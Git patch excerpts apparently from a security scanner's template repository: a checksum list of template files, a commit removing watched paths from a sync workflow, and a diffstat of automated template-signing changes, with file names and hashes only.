+network/detection/gnu-inetutils-ftpd-detect.yaml:b9047246807cef992c713711c49316ce026213be +network/detection/gopher-detect.yaml:d074aee6bb2ca3e000dac830084719e1fd92408a +network/detection/ibm-d2b-database-server.yaml:821265dd83454fb166d6bcfd47edea5d880a982a +network/detection/imap-detect.yaml:c061296e4b0d118acb1e98de780cbb6fd8712d39 +network/detection/iplanet-imap-detect.yaml:b0ab8ab7d959e744e0edf2e6caa742d5247817d5 +network/detection/java-rmi-detect.yaml:4a3766c05729259e425ed9053d1c0c2d870ff4c6 +network/detection/microsoft-ftp-service.yaml:8ac016c354c4cbba1b7db781087f762ed7cb3f0b +network/detection/mikrotik-ftp-server-detect.yaml:d79eda08d15c11d6ffffaf9c9259f7cc57712b07 +network/detection/mikrotik-routeros-api.yaml:bdcd123505a3cb02cdf8d194969f447241eb9345 +network/detection/mongodb-detect.yaml:91e54ff6bff3eb7c73f93cd81302fc83b7b776c5 +network/detection/moveit-sftp-detect.yaml:5668668fe0774f1d34826c7b0a780ac75e4a31d5 +network/detection/msmq-detect.yaml:b0b53a066286fcf74c78f54599e19b210cb5911e +network/detection/mysql-detect.yaml:7749ba298c99d79c6f61c86a8d3212a6ac153dbe +network/detection/openssh-detect.yaml:5c6f9f7c5c918923323698d173d0bec6064a45df +network/detection/pgsql-detect.yaml:f1071058bc9e90739c2f3b26fae0c506b4925669 +network/detection/pop3-detect.yaml:8fef0e19974bb0b0b9abf0a18ab6489569de2a0c +network/detection/proftpd-server-detect.yaml:a48529c178713f1bf32cc75b113f6b61ce811881 +network/detection/rabbitmq-detect.yaml:f95efdbe1c12dd668b424e184deaf268ffb1b3e2 +network/detection/rdp-detect.yaml:444581f156d4ed47795930d9d90a63130d38777a +network/detection/redis-detect.yaml:87d0739d45af47dd33dc5f90358bb899b00233c1 +network/detection/riak-detect.yaml:933342a2e4e97cef11175882062bec50d81a7ae1 +network/detection/rpcbind-portmapper-detect.yaml:c25b72fcc75fe873a7da77bad61cf699cd44b734 +network/detection/rsyncd-service-detect.yaml:711ae78334a14a7f2f9cab127db2b3f40ce02366 +network/detection/rtsp-detect.yaml:a8f18fc5edaa5e36f3d22d237d8165e75622d30a +network/detection/sap-router.yaml:6a7c00f4a502a65b4c35d0ed75ab073fcffd335b +network/detection/smtp-detect.yaml:0a8e9170a85d8c3dff875ec526033e009fc0bcc6 +network/detection/sshd-dropbear-detect.yaml:15934fc8dd0963f2f28cea67378d4dce54578fbf +network/detection/starttls-mail-detect.yaml:a20c2b8a9ec603998da792ae93869c784c2bfbb5 +network/detection/teamspeak3-detect.yaml:ac2984532b01ae135deb721590729ba77660aef6 +network/detection/telnet-detect.yaml:0d4a44e50e71382c658cfbbd4418d05daa4604d9 +network/detection/totemomail-smtp-detect.yaml:00dc35509913204c643c3b3203855c2bd88ab837 +network/detection/vmware-authentication-daemon-detect.yaml:1fff73db9e46a9967a8c66e6f143a3456e34a47b +network/detection/vnc-service-detect.yaml:23bfea46815ffe054cf9e6ee8f779e197de8abfb +network/detection/weblogic-iiop-detect.yaml:9b0e7d73263047b22e33856a3ed4ee1b41fba5c1 +network/detection/weblogic-t3-detect.yaml:d5293b0b9c6e08667f909caad9d19ac81d24b740 +network/detection/wing-ftp-detect.yaml:a3a3e342e7aaf8353fae0937708542a43c254493 +network/detection/ws_ftp-ssh-detect.yaml:afa64085926dc1a7ae1f565c2178a7504288b8dd +network/detection/xlight-ftp-service-detect.yaml:59b472e512f55fcdd88f7d2b8292cec016163140 +network/enumeration/beanstalk-service.yaml:214386c0f6168a7744dcda5876fa11e27e033087 +network/enumeration/kafka-topics-list.yaml:fe3a98cfe12efde6fe238fa87d334b81f7e2cf1d +network/enumeration/mongodb-info-enum.yaml:cc426d4b1b6f11861c589a5cf8c89932e4bce1f5 +network/enumeration/niagara-fox-info-enum.yaml:f7122469fbd276ff871f0e1cd8533afc256fa0bd +network/enumeration/psql-user-enum.yaml:9d40e07e03f9a4a6fdaeb84333d6d2789a3d435d +network/enumeration/smtp/smtp-commands-enum.yaml:ac8481da112d15e10d67a4bc54c5339257c8ad12 +network/enumeration/smtp/smtp-user-enum.yaml:998d62615f5ff17a125fd6842d6894fa9515f431 +network/exposures/cisco-smi-exposure.yaml:d38f6f2c289b2c163c50268ff0d60a25d78d3711 +network/exposures/exposed-adb.yaml:8ee3a9ce054580d35341f308bd1b8156fad2538b +network/exposures/exposed-dockerd.yaml:f0b4bb3907cc140818a95cb9530f8fa9165d3054 +network/exposures/exposed-redis.yaml:62355e9ddd20db13188c42afd020239fd5aa5e87 +network/exposures/exposed-zookeeper.yaml:d068ec4a948808c6d0a2f5f274b77f71d1f92a7a +network/honeypot/adbhoney-honeypot-cnxn-detect.yaml:236d4b5ddbd65bfce3700b25a20a951ef3123d86 +network/honeypot/adbhoney-honeypot-shell-detect.yaml:c78180decd140ed563965af72a563cbbfa739d85 +network/honeypot/conpot-siemens-honeypot-detect.yaml:2362deb4027b60cc1542efc1ea5110ddb0b3ac35 +network/honeypot/cowrie-ssh-honeypot-detect.yaml:1df4cfc95a9208b42fd6141baec3b04d71cf95e3 +network/honeypot/dionaea-ftp-honeypot-detect.yaml:752e07eaa8f32a73854278735b319618911647ae +network/honeypot/dionaea-mqtt-honeypot-detect.yaml:428c82a261659334ca7113aca828bf3e5cb308b2 +network/honeypot/dionaea-mysql-honeypot-detect.yaml:3fb3d162c16c772254310e5e91ba7426f3bce873 +network/honeypot/dionaea-smb-honeypot-detect.yaml:d7c6ef02bcaebbe3f73777516d786173705157f9 +network/honeypot/gaspot-honeypot-detect.yaml:e8f645bf0b290ff53fcad9c1e0ad44bed6cea11c +network/honeypot/mailoney-honeypot-detect.yaml:84d528d938a3d78143c5e43a76a383e471bf5d00 +network/honeypot/redis-honeypot-detect.yaml:df4b6b0299d5f8bfd5da632db536564f0e82f684 +network/jarm/c2/cobalt-strike-c2-jarm.yaml:ba5f43178189dff0b3809d22ca2074c29d2d28bc +network/jarm/c2/covenant-c2-jarm.yaml:e9ad69e2dbb7cd291a7a84ddb72beaa575a62833 +network/jarm/c2/deimos-c2-jarm.yaml:a36aec71fd9bd45d693bdff5b0c93ce8e0c863cd +network/jarm/c2/evilginx2-jarm.yaml:d2563a7d454766c3b47c8228cc8af917e4b89e26 +network/jarm/c2/generic-c2-jarm.yaml:ec45045ac7d881dbd80f47b00108028a79a3280d +network/jarm/c2/grat2-c2-jarm.yaml:0b6150544c6e31cb413736a4a2eb17f398623a4a +network/jarm/c2/havoc-c2-jarm.yaml:4028696845b5b853fce8224def4ef2043059f14c +network/jarm/c2/mac-c2-jarm.yaml:a182384a7f21636731e0bfe349bdcae51da7119f +network/jarm/c2/macshell-c2-jarm.yaml:8d5a96b05930d65e0018e2d3470a803e687c3551 +network/jarm/c2/merlin-c2-jarm.yaml:bd60da6a898f5a0421d8da3b8c94ee8338507dea +network/jarm/c2/metasploit-c2-jarm.yaml:624c80c46f0f9efebccc00b0a905dbe7a91b593a +network/jarm/c2/mythic-c2-jarm.yaml:a79ceb8da5117999640f4b7d088f33a4ec30cd78 +network/jarm/c2/posh-c2-jarm.yaml:bcbe5ccf88eb2f2c14257180ff50e6dae822f451 +network/jarm/c2/shad0w-c2-jarm.yaml:96cc8d2d739b5c24e04679e71b544065aa271fa0 +network/jarm/c2/silenttrinity-c2-jarm.yaml:fefcd54e7fe848894fac2e49f9d11016088a5b28 +network/jarm/c2/sliver-c2-jarm.yaml:de9750a325c98797f90f17ecd2392747c4bd8c76 +network/misconfig/apache-dubbo-unauth.yaml:2913b4a987fd8d01cc2b282a94ac74237e6281bc +network/misconfig/apache-rocketmq-broker-unauth.yaml:fa61f781c301bf536ef8fc7fe044fe65673997c8 +network/misconfig/clamav-unauth.yaml:43deefef3ed4b6dcb67fab12909660d10a18529c +network/misconfig/clickhouse-unauth.yaml:fb0050986d504f8fd20eea6dc2d585339490b12e +network/misconfig/erlang-daemon.yaml:6b590630f8a85b6edecd27e5f1ace6bcc9781872 +network/misconfig/ganglia-xml-grid-monitor.yaml:be8998a3e56d41513f71710963d8dcb49c4ea050 +network/misconfig/memcached-stats.yaml:c800e920c95ce582bfc3b4e910e4e12dfa2fdf76 +network/misconfig/mongodb-unauth.yaml:b227ce2969bf0aa6cba7714f0da64d7d95f2a769 +network/misconfig/mysql-native-password.yaml:0b06c0ad92c904ca5e0b38fb4184fcb737873c71 +network/misconfig/printers-info-leak.yaml:7040836a95d65dfd772be2ebb8176de844ea1f46 +network/misconfig/sap-router-info-leak.yaml:e81eb909bc647dfcb05f8f24ae9c13ae28f30b74 +network/misconfig/tidb-native-password.yaml:bc7dc91866a0f94f018ea9a1a1c0e5abb23b64b1 +network/misconfig/tidb-unauth.yaml:b7ac01510f169fc44fe1bfde8af63d0dbc1b85ef +network/misconfig/unauth-psql.yaml:84a413c87cbb6c8aa60ed9a06dd490b2dbee11cf +network/vulnerabilities/clockwatch-enterprise-rce.yaml:2dbd31cc1abd9e6076a76dc03d36f527d1868bbf +passive/cves/2024/CVE-2024-25723.yaml:eef08a5ff93f9eed38e2de65cfde62d397ed8e5d profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 profiles/all.yml:da115a47ed611622537dfbbe17e912010916c741 profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc @@ -8617,9 +8617,9 @@ ssl/c2/orcus-rat-c2.yaml:dea15f4e0426ff409be1fc8ab06bfc43980982ef ssl/c2/posh-c2.yaml:fed2844484f59140ce7dd1713024ef81276f26b2 ssl/c2/quasar-rat-c2.yaml:c3bf40b6fd278294f273f10d6826f401cec3cb1f ssl/c2/shadowpad-c2.yaml:45b74e7a9adff29793a0efa5bfcf1afa3bcfeacd -ssl/c2/sliver-c2.yaml:35ed94dbbde1615aee5d86a3ce75791cc5d4b631 -ssl/c2/venomrat.yaml:deffc1efa16ee53701962b41e8cbcab9e106208d -ssl/deprecated-tls.yaml:83590258f2dd4d9712d03d77a2076a9ee66c37df +ssl/c2/sliver-c2.yaml:ff173491e37fa64f306910ba9b09cca94340e169 +ssl/c2/venomrat.yaml:08aa0f900af87f9a9f844cf65512247224cd8a70 +ssl/deprecated-tls.yaml:924899ebe22708c890f47d7ef1edff2f5423a969 ssl/detect-ssl-issuer.yaml:3483faacc9cc303cac30d6c844bbe0a47c1d2e39 ssl/expired-ssl.yaml:a0c32548eb093d043f77f77eb905ac69e5d0e5b0 ssl/insecure-cipher-suite-detect.yaml:33ff0bbe66e06d4a01b13e40512e2838c9cf7f13 @@ -8632,7 +8632,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:578be9174f52308e922dc6d7a70c78d854290af3 +templates-checksum.txt:138675b8d347541d79d21f20674b3f8b4aa1bb61 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c627df2a3eb55044574c4d87dabc7aef12f940da Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sat, 8 Jun 2024 16:01:10 +0000 Subject: [PATCH 750/847] Syncing Templates --- .github/workflows/templates-sync.yml | 77 ---------------------------- 1 file changed, 77 deletions(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a0f23f3d70..37f01c16d6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,83 +3,6 @@ on: push: paths: - '.new-additions' - - 'cloud/aws/sns/sns-topic-public-accessible.yaml' - - 'headless/webpack-sourcemap.yaml' - - 'http/cnvd/2024/CNVD-2024-15077.yaml' - - 'http/cves/2022/CVE-2022-0666.yaml' - - 'http/cves/2022/CVE-2022-1580.yaml' - - 'http/cves/2022/CVE-2022-34534.yaml' - - 'http/cves/2023/CVE-2023-2059.yaml' - - 'http/cves/2023/CVE-2023-3077.yaml' - - 'http/cves/2023/CVE-2023-35162.yaml' - - 'http/cves/2023/CVE-2023-48084.yaml' - - 'http/cves/2024/CVE-2024-1380.yaml' - - 'http/cves/2024/CVE-2024-21683.yaml' - - 'http/cves/2024/CVE-2024-24919.yaml' - - 'http/cves/2024/CVE-2024-27348.yaml' - - 'http/cves/2024/CVE-2024-34470.yaml' - - 'http/cves/2024/CVE-2024-3495.yaml' - - 'http/cves/2024/CVE-2024-3822.yaml' - - 'http/cves/2024/CVE-2024-4358.yaml' - - 'http/cves/2024/CVE-2024-5230.yaml' - - 'http/default-logins/ampjuke-default-login.yaml' - - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - - 'http/exposed-panels/busybox-repository-browser.yaml' - - 'http/exposed-panels/cisco-firepower-panel.yaml' - - 'http/exposed-panels/cox-business-panel.yaml' - - 'http/exposed-panels/digital-watchdog-panel.yaml' - - 'http/exposed-panels/f5-admin-interface.yaml' - - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' - - 'http/exposed-panels/oracle-access-management.yaml' - - 'http/exposed-panels/oracle-peoplesoft-panel.yaml' - - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - - 'http/iot/netgear-boarddataww-rce.yaml' - - 'http/miscellaneous/directory-listing.yaml' - - 'http/misconfiguration/dont-panic-traceback.yaml' - - 'http/misconfiguration/installer/activecollab-installer.yaml' - - 'http/misconfiguration/installer/call-com-installer.yaml' - - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - - 'http/misconfiguration/installer/confluence-installer.yaml' - - 'http/misconfiguration/installer/cubebackup-setup-installer.yaml' - - 'http/misconfiguration/installer/easy-wi-installer.yaml' - - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' - - 'http/misconfiguration/installer/flarum-installer.yaml' - - 'http/misconfiguration/installer/fleetcart-installer.yaml' - - 'http/misconfiguration/installer/glpi-installer.yaml' - - 'http/misconfiguration/installer/invicti-enterprise-installer.yaml' - - 'http/misconfiguration/installer/invoice-ninja-installer.yaml' - - 'http/misconfiguration/installer/jfa-go-installer.yaml' - - 'http/misconfiguration/installer/justfans-installer.yaml' - - 'http/misconfiguration/installer/librenms-installer.yaml' - - 'http/misconfiguration/installer/mura-cms-setup-installer.yaml' - - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - - 'http/misconfiguration/installer/orchard-installer.yaml' - - 'http/misconfiguration/installer/pandora-fms-installer.yaml' - - 'http/misconfiguration/installer/profittrailer-installer.yaml' - - 'http/misconfiguration/installer/projectsend-installer.yaml' - - 'http/misconfiguration/installer/snipe-it-installer.yaml' - - 'http/misconfiguration/installer/stackposts-installer.yaml' - - 'http/misconfiguration/installer/tastyigniter-installer.yaml' - - 'http/misconfiguration/installer/ubersmith-installer.yaml' - - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' - - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - - 'http/misconfiguration/installer/wowonder-installer.yaml' - - 'http/technologies/cowboy-detect.yaml' - - 'http/technologies/gabia-server-detect.yaml' - - 'http/technologies/gotweb-detect.yaml' - - 'http/technologies/sparklighter-detect.yaml' - - 'http/vulnerabilities/other/aquatronica-info-leak.yaml' - - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - - 'http/vulnerabilities/other/cerio-dt-rce.yaml' - - 'http/vulnerabilities/other/easycvr-info-leak.yaml' - - 'javascript/backdoor/proftpd-backdoor.yaml' - - 'javascript/detection/samba-detect.yaml' - - 'javascript/enumeration/rsync/rsync-list-modules.yaml' - - 'network/detection/bitvise-ssh-detect.yaml' - - 'passive/cves/2024/CVE-2024-25723.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 3d255ddfdd871154585e89454affe7c428baa4bd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 8 Jun 2024 16:02:17 +0000 Subject: [PATCH 751/847] Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: --- cloud/aws/acm/acm-cert-renewal-30days.yaml | 2 +- cloud/aws/acm/acm-cert-renewal-45days.yaml | 2 +- cloud/aws/acm/acm-cert-validation.yaml | 2 +- cloud/aws/acm/acm-wildcard-cert.yaml | 2 +- cloud/aws/aws-code-env.yaml | 2 +- cloud/aws/cloudtrail/cloudtrail-data-events.yaml | 2 +- cloud/aws/cloudtrail/cloudtrail-disabled.yaml | 2 +- cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml | 2 +- cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml | 2 +- cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml | 2 +- cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml | 2 +- cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml | 2 +- cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml | 2 +- cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml | 2 +- cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml | 2 +- cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml | 2 +- cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml | 2 +- cloud/aws/cloudwatch/cw-alarm-action-set.yaml | 2 +- cloud/aws/cloudwatch/cw-alarms-actions.yaml | 2 +- cloud/aws/ec2/ec2-imdsv2.yaml | 2 +- cloud/aws/ec2/ec2-public-ip.yaml | 2 +- cloud/aws/ec2/ec2-sg-egress-open.yaml | 2 +- cloud/aws/ec2/ec2-sg-ingress.yaml | 2 +- cloud/aws/ec2/publicly-shared-ami.yaml | 2 +- cloud/aws/ec2/unencrypted-aws-ami.yaml | 2 +- cloud/aws/iam/iam-full-admin-privileges.yaml | 2 +- cloud/aws/iam/iam-key-rotation-90days.yaml | 2 +- cloud/aws/iam/iam-mfa-enable.yaml | 2 +- cloud/aws/iam/iam-ssh-keys-rotation.yaml | 2 +- cloud/aws/rds/aurora-copy-tags-snap.yaml | 2 +- cloud/aws/rds/aurora-delete-protect.yaml | 2 +- cloud/aws/rds/iam-db-auth.yaml | 2 +- cloud/aws/rds/rds-backup-enable.yaml | 2 +- cloud/aws/rds/rds-deletion-protection.yaml | 2 +- cloud/aws/rds/rds-encryption-check.yaml | 2 +- cloud/aws/rds/rds-gp-ssd-usage.yaml | 2 +- cloud/aws/rds/rds-public-snapshot.yaml | 2 +- cloud/aws/rds/rds-public-subnet.yaml | 2 +- cloud/aws/rds/rds-ri-payment-fail.yaml | 2 +- cloud/aws/rds/rds-snapshot-encryption.yaml | 2 +- cloud/aws/s3/s3-access-logging.yaml | 2 +- cloud/aws/s3/s3-auth-fullcontrol.yaml | 2 +- cloud/aws/s3/s3-bucket-key.yaml | 2 +- cloud/aws/s3/s3-bucket-policy-public-access.yaml | 2 +- cloud/aws/s3/s3-mfa-delete-check.yaml | 2 +- cloud/aws/s3/s3-public-read-acp.yaml | 2 +- cloud/aws/s3/s3-public-read.yaml | 2 +- cloud/aws/s3/s3-public-write-acp.yaml | 2 +- cloud/aws/s3/s3-public-write.yaml | 2 +- cloud/aws/s3/s3-server-side-encryption.yaml | 2 +- cloud/aws/s3/s3-versioning.yaml | 2 +- cloud/aws/sns/sns-topic-public-accessible.yaml | 3 ++- cloud/aws/vpc/nacl-open-inbound.yaml | 2 +- cloud/aws/vpc/nacl-outbound-restrict.yaml | 2 +- cloud/aws/vpc/nat-gateway-usage.yaml | 2 +- cloud/aws/vpc/unrestricted-admin-ports.yaml | 2 +- cloud/aws/vpc/vpc-endpoint-exposed.yaml | 2 +- cloud/aws/vpc/vpc-endpoints-not-deployed.yaml | 2 +- cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml | 2 +- cloud/aws/vpc/vpn-tunnel-down.yaml | 2 +- cloud/enum/azure-db-enum.yaml | 3 +-- cloud/enum/azure-vm-cloud-enum.yaml | 3 +-- code/cves/2019/CVE-2019-14287.yaml | 2 +- code/cves/2021/CVE-2021-3156.yaml | 2 +- code/cves/2023/CVE-2023-2640.yaml | 2 +- code/cves/2023/CVE-2023-49105.yaml | 2 +- code/cves/2023/CVE-2023-4911.yaml | 2 +- code/cves/2023/CVE-2023-6246.yaml | 2 +- code/cves/2024/CVE-2024-3094.yaml | 2 +- code/privilege-escalation/linux/binary/privesc-sqlite3.yaml | 2 +- dast/cves/2018/CVE-2018-19518.yaml | 2 +- dast/cves/2021/CVE-2021-45046.yaml | 2 +- dast/cves/2022/CVE-2022-42889.yaml | 2 +- dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml | 2 +- dast/vulnerabilities/cmdi/ruby-open-rce.yaml | 2 +- dast/vulnerabilities/crlf/cookie-injection.yaml | 2 +- dast/vulnerabilities/crlf/crlf-injection.yaml | 2 +- dast/vulnerabilities/lfi/lfi-keyed.yaml | 2 +- dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml | 2 +- dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml | 2 +- dast/vulnerabilities/redirect/open-redirect.yaml | 2 +- dast/vulnerabilities/rfi/generic-rfi.yaml | 2 +- dast/vulnerabilities/sqli/sqli-error-based.yaml | 2 +- dast/vulnerabilities/ssrf/blind-ssrf.yaml | 2 +- dast/vulnerabilities/ssrf/response-ssrf.yaml | 2 +- dast/vulnerabilities/ssti/reflection-ssti.yaml | 2 +- dast/vulnerabilities/xss/reflected-xss.yaml | 2 +- dast/vulnerabilities/xxe/generic-xxe.yaml | 2 +- dns/bimi-detect.yaml | 2 +- file/keys/credential-exposure-file.yaml | 2 +- headless/cves/2018/CVE-2018-25031.yaml | 2 +- headless/webpack-sourcemap.yaml | 2 +- http/cnvd/2017/CNVD-2017-06001.yaml | 2 +- http/cnvd/2019/CNVD-2019-06255.yaml | 2 +- http/cves/2001/CVE-2001-0537.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 2 +- http/cves/2005/CVE-2005-2428.yaml | 2 +- http/cves/2005/CVE-2005-3634.yaml | 2 +- http/cves/2006/CVE-2006-2842.yaml | 2 +- http/cves/2007/CVE-2007-3010.yaml | 2 +- http/cves/2007/CVE-2007-5728.yaml | 2 +- http/cves/2008/CVE-2008-1061.yaml | 2 +- http/cves/2008/CVE-2008-1547.yaml | 2 +- http/cves/2008/CVE-2008-5587.yaml | 2 +- http/cves/2008/CVE-2008-6465.yaml | 2 +- http/cves/2008/CVE-2008-6982.yaml | 2 +- http/cves/2008/CVE-2008-7269.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 2 +- http/cves/2009/CVE-2009-1496.yaml | 2 +- http/cves/2009/CVE-2009-1872.yaml | 2 +- http/cves/2009/CVE-2009-4202.yaml | 2 +- http/cves/2009/CVE-2009-5114.yaml | 2 +- http/cves/2010/CVE-2010-0157.yaml | 2 +- http/cves/2010/CVE-2010-0219.yaml | 2 +- http/cves/2010/CVE-2010-0696.yaml | 2 +- http/cves/2010/CVE-2010-0944.yaml | 2 +- http/cves/2010/CVE-2010-0985.yaml | 2 +- http/cves/2010/CVE-2010-1219.yaml | 2 +- http/cves/2010/CVE-2010-1314.yaml | 2 +- http/cves/2010/CVE-2010-1352.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 +- http/cves/2010/CVE-2010-1470.yaml | 2 +- http/cves/2010/CVE-2010-1475.yaml | 2 +- http/cves/2010/CVE-2010-1531.yaml | 2 +- http/cves/2010/CVE-2010-1601.yaml | 2 +- http/cves/2010/CVE-2010-1603.yaml | 2 +- http/cves/2010/CVE-2010-1719.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 2 +- http/cves/2010/CVE-2010-1875.yaml | 2 +- http/cves/2010/CVE-2010-1981.yaml | 2 +- http/cves/2010/CVE-2010-2035.yaml | 2 +- http/cves/2010/CVE-2010-2128.yaml | 2 +- http/cves/2010/CVE-2010-2307.yaml | 2 +- http/cves/2010/CVE-2010-2857.yaml | 2 +- http/cves/2010/CVE-2010-2861.yaml | 2 +- http/cves/2010/CVE-2010-2920.yaml | 2 +- http/cves/2010/CVE-2010-4719.yaml | 2 +- http/cves/2011/CVE-2011-1669.yaml | 2 +- http/cves/2011/CVE-2011-4624.yaml | 2 +- http/cves/2011/CVE-2011-4640.yaml | 2 +- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2011/CVE-2011-5107.yaml | 2 +- http/cves/2011/CVE-2011-5179.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 2 +- http/cves/2011/CVE-2011-5265.yaml | 2 +- http/cves/2012/CVE-2012-0392.yaml | 2 +- http/cves/2012/CVE-2012-0394.yaml | 2 +- http/cves/2012/CVE-2012-0901.yaml | 2 +- http/cves/2012/CVE-2012-0991.yaml | 2 +- http/cves/2012/CVE-2012-1835.yaml | 2 +- http/cves/2012/CVE-2012-2371.yaml | 2 +- http/cves/2012/CVE-2012-3153.yaml | 2 +- http/cves/2012/CVE-2012-4032.yaml | 2 +- http/cves/2012/CVE-2012-4242.yaml | 2 +- http/cves/2012/CVE-2012-4253.yaml | 2 +- http/cves/2012/CVE-2012-4273.yaml | 2 +- http/cves/2012/CVE-2012-4768.yaml | 2 +- http/cves/2012/CVE-2012-4940.yaml | 2 +- http/cves/2012/CVE-2012-5913.yaml | 2 +- http/cves/2013/CVE-2013-1965.yaml | 2 +- http/cves/2013/CVE-2013-2248.yaml | 2 +- http/cves/2013/CVE-2013-2251.yaml | 2 +- http/cves/2013/CVE-2013-2287.yaml | 2 +- http/cves/2013/CVE-2013-3526.yaml | 2 +- http/cves/2013/CVE-2013-3827.yaml | 2 +- http/cves/2013/CVE-2013-4117.yaml | 2 +- http/cves/2013/CVE-2013-4625.yaml | 2 +- http/cves/2013/CVE-2013-7091.yaml | 2 +- http/cves/2014/CVE-2014-3206.yaml | 2 +- http/cves/2014/CVE-2014-3704.yaml | 2 +- http/cves/2014/CVE-2014-4210.yaml | 2 +- http/cves/2014/CVE-2014-4513.yaml | 2 +- http/cves/2014/CVE-2014-4535.yaml | 2 +- http/cves/2014/CVE-2014-4536.yaml | 2 +- http/cves/2014/CVE-2014-4539.yaml | 2 +- http/cves/2014/CVE-2014-4544.yaml | 2 +- http/cves/2014/CVE-2014-4550.yaml | 2 +- http/cves/2014/CVE-2014-4558.yaml | 2 +- http/cves/2014/CVE-2014-4561.yaml | 2 +- http/cves/2014/CVE-2014-4592.yaml | 2 +- http/cves/2014/CVE-2014-5368.yaml | 2 +- http/cves/2014/CVE-2014-6308.yaml | 2 +- http/cves/2014/CVE-2014-8682.yaml | 2 +- http/cves/2014/CVE-2014-9094.yaml | 2 +- http/cves/2014/CVE-2014-9180.yaml | 2 +- http/cves/2015/CVE-2015-1503.yaml | 2 +- http/cves/2015/CVE-2015-1635.yaml | 2 +- http/cves/2015/CVE-2015-1880.yaml | 2 +- http/cves/2015/CVE-2015-20067.yaml | 2 +- http/cves/2015/CVE-2015-2067.yaml | 2 +- http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2794.yaml | 2 +- http/cves/2015/CVE-2015-2807.yaml | 2 +- http/cves/2015/CVE-2015-3035.yaml | 2 +- http/cves/2015/CVE-2015-3897.yaml | 2 +- http/cves/2015/CVE-2015-4063.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 2 +- http/cves/2015/CVE-2015-4455.yaml | 2 +- http/cves/2015/CVE-2015-5469.yaml | 2 +- http/cves/2015/CVE-2015-6920.yaml | 2 +- http/cves/2015/CVE-2015-7297.yaml | 2 +- http/cves/2015/CVE-2015-7450.yaml | 2 +- http/cves/2015/CVE-2015-7780.yaml | 2 +- http/cves/2015/CVE-2015-7823.yaml | 2 +- http/cves/2015/CVE-2015-8399.yaml | 2 +- http/cves/2015/CVE-2015-9414.yaml | 2 +- http/cves/2016/CVE-2016-0957.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 2 +- http/cves/2016/CVE-2016-1000127.yaml | 2 +- http/cves/2016/CVE-2016-1000128.yaml | 2 +- http/cves/2016/CVE-2016-1000129.yaml | 2 +- http/cves/2016/CVE-2016-1000130.yaml | 2 +- http/cves/2016/CVE-2016-1000131.yaml | 2 +- http/cves/2016/CVE-2016-1000132.yaml | 2 +- http/cves/2016/CVE-2016-1000133.yaml | 2 +- http/cves/2016/CVE-2016-1000134.yaml | 2 +- http/cves/2016/CVE-2016-1000135.yaml | 2 +- http/cves/2016/CVE-2016-1000136.yaml | 2 +- http/cves/2016/CVE-2016-1000137.yaml | 2 +- http/cves/2016/CVE-2016-1000138.yaml | 2 +- http/cves/2016/CVE-2016-1000139.yaml | 2 +- http/cves/2016/CVE-2016-1000140.yaml | 2 +- http/cves/2016/CVE-2016-1000141.yaml | 2 +- http/cves/2016/CVE-2016-1000142.yaml | 2 +- http/cves/2016/CVE-2016-1000143.yaml | 2 +- http/cves/2016/CVE-2016-1000146.yaml | 2 +- http/cves/2016/CVE-2016-1000148.yaml | 2 +- http/cves/2016/CVE-2016-1000149.yaml | 2 +- http/cves/2016/CVE-2016-1000152.yaml | 2 +- http/cves/2016/CVE-2016-1000153.yaml | 2 +- http/cves/2016/CVE-2016-1000154.yaml | 2 +- http/cves/2016/CVE-2016-1000155.yaml | 2 +- http/cves/2016/CVE-2016-10134.yaml | 2 +- http/cves/2016/CVE-2016-10367.yaml | 2 